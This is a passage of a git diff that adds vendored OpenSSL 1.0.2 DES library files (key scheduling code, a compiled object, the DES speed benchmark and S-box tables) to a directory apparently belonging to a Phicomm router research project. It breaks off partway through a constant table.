+         ((d & 0x00ff0000L) >> 16L) | ((c & 0xf0000000L) >> 4L));
+    c &= 0x0fffffffL;
+
+    for (i = 0; i < ITERATIONS; i++) {
+        if (shifts2[i]) {
+            c = ((c >> 2L) | (c << 26L));
+            d = ((d >> 2L) | (d << 26L));
+        } else {
+            c = ((c >> 1L) | (c << 27L));
+            d = ((d >> 1L) | (d << 27L));
+        }
+        c &= 0x0fffffffL;
+        d &= 0x0fffffffL;
+        /*
+         * could be a few less shifts but I am to lazy at this point in time
+         * to investigate
+         */
+        s = des_skb[0][(c) & 0x3f] |
+            des_skb[1][((c >> 6L) & 0x03) | ((c >> 7L) & 0x3c)] |
+            des_skb[2][((c >> 13L) & 0x0f) | ((c >> 14L) & 0x30)] |
+            des_skb[3][((c >> 20L) & 0x01) | ((c >> 21L) & 0x06) |
+                       ((c >> 22L) & 0x38)];
+        t = des_skb[4][(d) & 0x3f] |
+            des_skb[5][((d >> 7L) & 0x03) | ((d >> 8L) & 0x3c)] |
+            des_skb[6][(d >> 15L) & 0x3f] |
+            des_skb[7][((d >> 21L) & 0x0f) | ((d >> 22L) & 0x30)];
+
+        /* table contained 0213 4657 */
+        t2 = ((t << 16L) | (s & 0x0000ffffL)) & 0xffffffffL;
+        *(k++) = ROTATE(t2, 30) & 0xffffffffL;
+
+        t2 = ((s >> 16L) | (t & 0xffff0000L));
+        *(k++) = ROTATE(t2, 26) & 0xffffffffL;
+    }
+}
+
+int DES_key_sched(const_DES_cblock *key, DES_key_schedule *schedule)
+{
+    return (DES_set_key(key, schedule));
+}
+
+/*-
+#undef des_fixup_key_parity
+void des_fixup_key_parity(des_cblock *key)
+        {
+        des_set_odd_parity(key);
+        }
+*/
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/set_key.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/set_key.o
new file mode 100644
index 0000000000000000000000000000000000000000..a2d098f1985f9b9570da442f6bd0cae0262d5d94
GIT binary patch
literal 5888
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/speed.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/speed.c
new file mode 100644
index 0000000..9a3d929
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/speed.c
@@ -0,0 +1,299 @@
+/* crypto/des/speed.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/* 11-Sep-92 Andrew Daviel   Support for Silicon Graphics IRIX added */
+/* 06-Apr-92 Luke Brennan    Support for VMS and add extra signal calls */
+
+#if !defined(OPENSSL_SYS_MSDOS) && (!defined(OPENSSL_SYS_VMS) || defined(__DECC)) && !defined(OPENSSL_SYS_MACOSX)
+# define TIMES
+#endif
+
+#include <stdio.h>
+
+#include <openssl/e_os2.h>
+#include OPENSSL_UNISTD_IO
+OPENSSL_DECLARE_EXIT
+#ifndef OPENSSL_SYS_NETWARE
+# include <signal.h>
+# define crypt(c,s) (des_crypt((c),(s)))
+#endif
+#ifndef _IRIX
+# include <time.h>
+#endif
+#ifdef TIMES
+# include <sys/types.h>
+# include <sys/times.h>
+#endif
+    /*
+     * Depending on the VMS version, the tms structure is perhaps defined.
+     * The __TMS macro will show if it was.  If it wasn't defined, we should
+     * undefine TIMES, since that tells the rest of the program how things
+     * should be handled.  -- Richard Levitte
+     */
+#if defined(OPENSSL_SYS_VMS_DECC) && !defined(__TMS)
+# undef TIMES
+#endif
+#ifndef TIMES
+# include <sys/timeb.h>
+#endif
+#if defined(sun) || defined(__ultrix)
+# define _POSIX_SOURCE
+# include <limits.h>
+# include <sys/param.h>
+#endif
+#include <openssl/des.h>
+/* The following if from times(3) man page.  It may need to be changed */
+#ifndef HZ
+# ifndef CLK_TCK
+#  ifndef _BSD_CLK_TCK_         /* FreeBSD fix */
+#   define HZ   100.0
+#  else                         /* _BSD_CLK_TCK_ */
+#   define HZ ((double)_BSD_CLK_TCK_)
+#  endif
+# else                          /* CLK_TCK */
+#  define HZ ((double)CLK_TCK)
+# endif
+#endif
+#define BUFSIZE ((long)1024)
+long run = 0;
+
+double Time_F(int s);
+#ifdef SIGALRM
+# if defined(__STDC__) || defined(sgi) || defined(_AIX)
+#  define SIGRETTYPE void
+# else
+#  define SIGRETTYPE int
+# endif
+
+SIGRETTYPE sig_done(int sig);
+SIGRETTYPE sig_done(int sig)
+{
+    signal(SIGALRM, sig_done);
+    run = 0;
+# ifdef LINT
+    sig = sig;
+# endif
+}
+#endif
+
+#define START   0
+#define STOP    1
+
+double Time_F(int s)
+{
+    double ret;
+#ifdef TIMES
+    static struct tms tstart, tend;
+
+    if (s == START) {
+        times(&tstart);
+        return (0);
+    } else {
+        times(&tend);
+        ret = ((double)(tend.tms_utime - tstart.tms_utime)) / HZ;
+        return ((ret == 0.0) ? 1e-6 : ret);
+    }
+#else                           /* !times() */
+    static struct timeb tstart, tend;
+    long i;
+
+    if (s == START) {
+        ftime(&tstart);
+        return (0);
+    } else {
+        ftime(&tend);
+        i = (long)tend.millitm - (long)tstart.millitm;
+        ret = ((double)(tend.time - tstart.time)) + ((double)i) / 1e3;
+        return ((ret == 0.0) ? 1e-6 : ret);
+    }
+#endif
+}
+
+int main(int argc, char **argv)
+{
+    long count;
+    static unsigned char buf[BUFSIZE];
+    static DES_cblock key =
+        { 0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0 };
+    static DES_cblock key2 =
+        { 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x12 };
+    static DES_cblock key3 =
+        { 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x12, 0x34 };
+    DES_key_schedule sch, sch2, sch3;
+    double a, b, c, d, e;
+#ifndef SIGALRM
+    long ca, cb, cc, cd, ce;
+#endif
+
+#ifndef TIMES
+    printf("To get the most accurate results, try to run this\n");
+    printf("program when this computer is idle.\n");
+#endif
+
+    DES_set_key_unchecked(&key2, &sch2);
+    DES_set_key_unchecked(&key3, &sch3);
+
+#ifndef SIGALRM
+    printf("First we calculate the approximate speed ...\n");
+    DES_set_key_unchecked(&key, &sch);
+    count = 10;
+    do {
+        long i;
+        DES_LONG data[2];
+
+        count *= 2;
+        Time_F(START);
+        for (i = count; i; i--)
+            DES_encrypt1(data, &sch, DES_ENCRYPT);
+        d = Time_F(STOP);
+    } while (d < 3.0);
+    ca = count;
+    cb = count * 3;
+    cc = count * 3 * 8 / BUFSIZE + 1;
+    cd = count * 8 / BUFSIZE + 1;
+    ce = count / 20 + 1;
+    printf("Doing set_key %ld times\n", ca);
+# define COND(d) (count != (d))
+# define COUNT(d) (d)
+#else
+# define COND(c) (run)
+# define COUNT(d) (count)
+    signal(SIGALRM, sig_done);
+    printf("Doing set_key for 10 seconds\n");
+    alarm(10);
+#endif
+
+    Time_F(START);
+    for (count = 0, run = 1; COND(ca); count++)
+        DES_set_key_unchecked(&key, &sch);
+    d = Time_F(STOP);
+    printf("%ld set_key's in %.2f seconds\n", count, d);
+    a = ((double)COUNT(ca)) / d;
+
+#ifdef SIGALRM
+    printf("Doing DES_encrypt's for 10 seconds\n");
+    alarm(10);
+#else
+    printf("Doing DES_encrypt %ld times\n", cb);
+#endif
+    Time_F(START);
+    for (count = 0, run = 1; COND(cb); count++) {
+        DES_LONG data[2];
+
+        DES_encrypt1(data, &sch, DES_ENCRYPT);
+    }
+    d = Time_F(STOP);
+    printf("%ld DES_encrypt's in %.2f second\n", count, d);
+    b = ((double)COUNT(cb) * 8) / d;
+
+#ifdef SIGALRM
+    printf("Doing DES_cbc_encrypt on %ld byte blocks for 10 seconds\n",
+           BUFSIZE);
+    alarm(10);
+#else
+    printf("Doing DES_cbc_encrypt %ld times on %ld byte blocks\n", cc,
+           BUFSIZE);
+#endif
+    Time_F(START);
+    for (count = 0, run = 1; COND(cc); count++)
+        DES_ncbc_encrypt(buf, buf, BUFSIZE, &sch, &key, DES_ENCRYPT);
+    d = Time_F(STOP);
+    printf("%ld DES_cbc_encrypt's of %ld byte blocks in %.2f second\n",
+           count, BUFSIZE, d);
+    c = ((double)COUNT(cc) * BUFSIZE) / d;
+
+#ifdef SIGALRM
+    printf("Doing DES_ede_cbc_encrypt on %ld byte blocks for 10 seconds\n",
+           BUFSIZE);
+    alarm(10);
+#else
+    printf("Doing DES_ede_cbc_encrypt %ld times on %ld byte blocks\n", cd,
+           BUFSIZE);
+#endif
+    Time_F(START);
+    for (count = 0, run = 1; COND(cd); count++)
+        DES_ede3_cbc_encrypt(buf, buf, BUFSIZE,
+                             &sch, &sch2, &sch3, &key, DES_ENCRYPT);
+    d = Time_F(STOP);
+    printf("%ld DES_ede_cbc_encrypt's of %ld byte blocks in %.2f second\n",
+           count, BUFSIZE, d);
+    d = ((double)COUNT(cd) * BUFSIZE) / d;
+
+#ifdef SIGALRM
+    printf("Doing crypt for 10 seconds\n");
+    alarm(10);
+#else
+    printf("Doing crypt %ld times\n", ce);
+#endif
+    Time_F(START);
+    for (count = 0, run = 1; COND(ce); count++)
+        crypt("testing1", "ef");
+    e = Time_F(STOP);
+    printf("%ld crypts in %.2f second\n", count, e);
+    e = ((double)COUNT(ce)) / e;
+
+    printf("set_key            per sec = %12.2f (%9.3fuS)\n", a, 1.0e6 / a);
+    printf("DES raw ecb bytes  per sec = %12.2f (%9.3fuS)\n", b, 8.0e6 / b);
+    printf("DES cbc bytes      per sec = %12.2f (%9.3fuS)\n", c, 8.0e6 / c);
+    printf("DES ede cbc bytes  per sec = %12.2f (%9.3fuS)\n", d, 8.0e6 / d);
+    printf("crypt              per sec = %12.2f (%9.3fuS)\n", e, 1.0e6 / e);
+    exit(0);
+#if defined(LINT) || defined(OPENSSL_SYS_MSDOS)
+    return (0);
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/spr.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/spr.h
new file mode 100644
index 0000000..4d94639
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/spr.h
@@ -0,0 +1,237 @@
+/* crypto/des/spr.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+OPENSSL_GLOBAL const DES_LONG DES_SPtrans[8][64] = {
+    {
+/* nibble 0 */
+     0x02080800L, 0x00080000L, 0x02000002L, 0x02080802L,
+     0x02000000L, 0x00080802L, 0x00080002L, 0x02000002L,
+     0x00080802L, 0x02080800L, 0x02080000L, 0x00000802L,
+     0x02000802L, 0x02000000L, 0x00000000L, 0x00080002L,
+     0x00080000L, 0x00000002L, 0x02000800L, 0x00080800L,
+     0x02080802L, 0x02080000L, 0x00000802L, 0x02000800L,
+     0x00000002L, 0x00000800L, 0x00080800L, 0x02080002L,
+     0x00000800L, 0x02000802L, 0x02080002L, 0x00000000L,
+     0x00000000L, 0x02080802L, 0x02000800L, 0x00080002L,
+     0x02080800L, 0x00080000L, 0x00000802L, 0x02000800L,
+     0x02080002L, 0x00000800L, 0x00080800L, 0x02000002L,
+     0x00080802L, 0x00000002L, 0x02000002L, 0x02080000L,
+     0x02080802L, 0x00080800L, 0x02080000L, 0x02000802L,
+     0x02000000L, 0x00000802L, 0x00080002L, 0x00000000L,
+     0x00080000L, 0x02000000L, 0x02000802L, 0x02080800L,
+     0x00000002L, 0x02080002L, 0x00000800L, 0x00080802L,
+     }, {
+/* nibble 1 */
+         0x40108010L, 0x00000000L, 0x00108000L, 0x40100000L,
+         0x40000010L, 0x00008010L, 0x40008000L, 0x00108000L,
+         0x00008000L, 0x40100010L, 0x00000010L, 0x40008000L,
+         0x00100010L, 0x40108000L, 0x40100000L, 0x00000010L,
+         0x00100000L, 0x40008010L, 0x40100010L, 0x00008000L,
+         0x00108010L, 0x40000000L, 0x00000000L, 0x00100010L,
+         0x40008010L, 0x00108010L, 0x40108000L, 0x40000010L,
+         0x40000000L, 0x00100000L, 0x00008010L, 0x40108010L,
+         0x00100010L, 0x40108000L, 0x40008000L, 0x00108010L,
+         0x40108010L, 0x00100010L, 0x40000010L, 0x00000000L,
+         0x40000000L, 0x00008010L, 0x00100000L, 0x40100010L,
+         0x00008000L, 0x40000000L, 0x00108010L, 0x40008010L,
+         0x40108000L, 0x00008000L, 0x00000000L, 0x40000010L,
+         0x00000010L, 0x40108010L, 0x00108000L, 0x40100000L,
+         0x40100010L, 0x00100000L, 0x00008010L, 0x40008000L,
+         0x40008010L, 0x00000010L, 0x40100000L, 0x00108000L,
+         }, {
+/* nibble 2 */
+             0x04000001L, 0x04040100L, 0x00000100L, 0x04000101L,
+             0x00040001L, 0x04000000L, 0x04000101L, 0x00040100L,
+             0x04000100L, 0x00040000L, 0x04040000L, 0x00000001L,
+             0x04040101L, 0x00000101L, 0x00000001L, 0x04040001L,
+             0x00000000L, 0x00040001L, 0x04040100L, 0x00000100L,
+             0x00000101L, 0x04040101L, 0x00040000L, 0x04000001L,
+             0x04040001L, 0x04000100L, 0x00040101L, 0x04040000L,
+             0x00040100L, 0x00000000L, 0x04000000L, 0x00040101L,
+             0x04040100L, 0x00000100L, 0x00000001L, 0x00040000L,
+             0x00000101L, 0x00040001L, 0x04040000L, 0x04000101L,
+             0x00000000L, 0x04040100L, 0x00040100L, 0x04040001L,
+             0x00040001L, 0x04000000L, 0x04040101L, 0x00000001L,
+             0x00040101L, 0x04000001L, 0x04000000L, 0x04040101L,
+             0x00040000L, 0x04000100L, 0x04000101L, 0x00040100L,
+             0x04000100L, 0x00000000L, 0x04040001L, 0x00000101L,
+             0x04000001L, 0x00040101L, 0x00000100L, 0x04040000L,
+             }, {
+/* nibble 3 */
+                 0x00401008L, 0x10001000L, 0x00000008L, 0x10401008L,
+                 0x00000000L, 0x10400000L, 0x10001008L, 0x00400008L,
+                 0x10401000L, 0x10000008L, 0x10000000L, 0x00001008L,
+                 0x10000008L, 0x00401008L, 0x00400000L, 0x10000000L,
+                 0x10400008L, 0x00401000L, 0x00001000L, 0x00000008L,
+                 0x00401000L, 0x10001008L, 0x10400000L, 0x00001000L,
+                 0x00001008L, 0x00000000L, 0x00400008L, 0x10401000L,
+                 0x10001000L, 0x10400008L, 0x10401008L, 0x00400000L,
+                 0x10400008L, 0x00001008L, 0x00400000L, 0x10000008L,
+                 0x00401000L, 0x10001000L, 0x00000008L, 0x10400000L,
+                 0x10001008L, 0x00000000L, 0x00001000L, 0x00400008L,
+                 0x00000000L, 0x10400008L, 0x10401000L, 0x00001000L,
+                 0x10000000L, 0x10401008L, 0x00401008L, 0x00400000L,
+                 0x10401008L, 0x00000008L, 0x10001000L, 0x00401008L,
+                 0x00400008L, 0x00401000L, 0x10400000L, 0x10001008L,
+                 0x00001008L, 0x10000000L, 0x10000008L, 0x10401000L,
+                 }, {
+/* nibble 4 */
+                     0x08000000L, 0x00010000L, 0x00000400L, 0x08010420L,
+                     0x08010020L, 0x08000400L, 0x00010420L, 0x08010000L,
+                     0x00010000L, 0x00000020L, 0x08000020L, 0x00010400L,
+                     0x08000420L, 0x08010020L, 0x08010400L, 0x00000000L,
+                     0x00010400L, 0x08000000L, 0x00010020L, 0x00000420L,
+                     0x08000400L, 0x00010420L, 0x00000000L, 0x08000020L,
+                     0x00000020L, 0x08000420L, 0x08010420L, 0x00010020L,
+                     0x08010000L, 0x00000400L, 0x00000420L, 0x08010400L,
+                     0x08010400L, 0x08000420L, 0x00010020L, 0x08010000L,
+                     0x00010000L, 0x00000020L, 0x08000020L, 0x08000400L,
+                     0x08000000L, 0x00010400L, 0x08010420L, 0x00000000L,
+                     0x00010420L, 0x08000000L, 0x00000400L, 0x00010020L,
+                     0x08000420L, 0x00000400L, 0x00000000L, 0x08010420L,
+                     0x08010020L, 0x08010400L, 0x00000420L, 0x00010000L,
+                     0x00010400L, 0x08010020L, 0x08000400L, 0x00000420L,
+                     0x00000020L, 0x00010420L, 0x08010000L, 0x08000020L,
+                     }, {
+/* nibble 5 */
+                         0x80000040L, 0x00200040L, 0x00000000L, 0x80202000L,
+                         0x00200040L, 0x00002000L, 0x80002040L, 0x00200000L,
+                         0x00002040L, 0x80202040L, 0x00202000L, 0x80000000L,
+                         0x80002000L, 0x80000040L, 0x80200000L, 0x00202040L,
+                         0x00200000L, 0x80002040L, 0x80200040L, 0x00000000L,
+                         0x00002000L, 0x00000040L, 0x80202000L, 0x80200040L,
+                         0x80202040L, 0x80200000L, 0x80000000L, 0x00002040L,
+                         0x00000040L, 0x00202000L, 0x00202040L, 0x80002000L,
+                         0x00002040L, 0x80000000L, 0x80002000L, 0x00202040L,
+                         0x80202000L, 0x00200040L, 0x00000000L, 0x80002000L,
+                         0x80000000L, 0x00002000L, 0x80200040L, 0x00200000L,
+                         0x00200040L, 0x80202040L, 0x00202000L, 0x00000040L,
+                         0x80202040L, 0x00202000L, 0x00200000L, 0x80002040L,
